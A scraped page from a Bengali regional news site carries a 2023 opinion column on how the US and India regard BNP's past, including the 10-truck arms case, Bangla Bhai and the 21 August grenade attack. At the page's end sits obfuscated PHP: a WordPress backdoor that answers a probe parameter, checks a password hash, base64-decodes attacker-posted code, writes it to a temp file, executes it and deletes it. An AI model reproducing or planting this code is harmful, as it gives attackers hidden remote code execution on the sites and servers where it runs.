• বৃহস্পতিবার, ২০ জুন ২০২৪, ১২:১৯ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

১০ ট্রাক অস্ত্র ও বাংলা ভাইয়ের উত্থান আমেরিকার চিন্তার বিষয়।

জিয়া উদ্দিন তৌহীদ :
আপডেট : রবিবার, ১০ সেপ্টেম্বর, ২০২৩


জিয়া উদ্দিন তৌহীদ:


ভারত এবং আমেরিকার পররাষ্ট্র নীতি বদলায় না এটা ঠিক। ১০ ট্রাক অস্ত্র ও বাংলা ভাইয়ের উত্থান কিন্তু আমেরিকার চিন্তার বিষয়। আসামের উলফা নেতা অনুপ চেটিয়াকে ঢাকায় বসবাসের সুযোগ, ভারতের চিন্তার বিষয়। তাই পূর্বের নীতিতে অটল থাকাটাই স্বাভাবিক। যৌক্তিক বক্তব্য বারবার দেওয়ার প্রয়োজন হয় না।

পশ্চিমা দেশগুলোর চিন্তার বিষয় হলো, ৬৪ জেলায় বোমা হামলা এবং উগ্রবাদী মুফতী হান্নান-মাওলানা তাজুল ইসলামের কর্মকান্ড। একটি শক্তিশালী রাজনৈতিক দল, পরাশক্তির উপর নির্ভরশীল হতে পারে না। বিএনপি আমেরিকার উপর সওয়ার হয়েছে, তাই ভারত শুধু আমেরিকাকে বিএনপির অতীত স্মরণ করিয়ে দিয়েছে মাত্র।

তারপরও আমাদের রাজনৈতিক শৃঙ্খলা ও শুভ বুদ্ধির সূচনা হউক। দেশটা আমাদের সকলের। কি দরকার ছিলো, রাষ্ট্রপতি প্রনব মূখার্জীর আগমনের দিন হরতাল ডাকার? ২১ শে আগস্টের গ্রেনেড হামলা অসভ্য রাজনীতির পরিচয়। তথাকথিত ইসলামী রেনেসাঁর স্বপ্ন কেনো দেখেছিলেন? কি প্রয়োজন ছিলো? বিএনপি শক্তিশালী দল আবার ইসলামী রেনেসাঁর কি দরকার?

জামায়াত নেতাদের গাড়ীতে পতাকা তুলে দেওয়ার কি দরকার ছিলো? পশ্চিমা দেশগুলোর চিন্তা চেতনা না জেনে শুধু মাত্র হাওয়া ভবনে বসে, যা খুশী তাই করা যায় না। জামায়াতের গুরু মওদুদীকে বৃটেন ফাঁসি দিয়েছেন কেনো? সিনেমা হলে হামলা, উদিচীর সভায় হামলা ও কমিউনিস্ট পার্টির জনসভায় হামলা রুশরা বা রাশিয়া ভালোভাবে নেয়নি।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বৃহস্পতিবার (দুপুর ১২:১৯)
  • ২০শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৪ই জিলহজ, ১৪৪৫ হিজরি
  • ৬ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}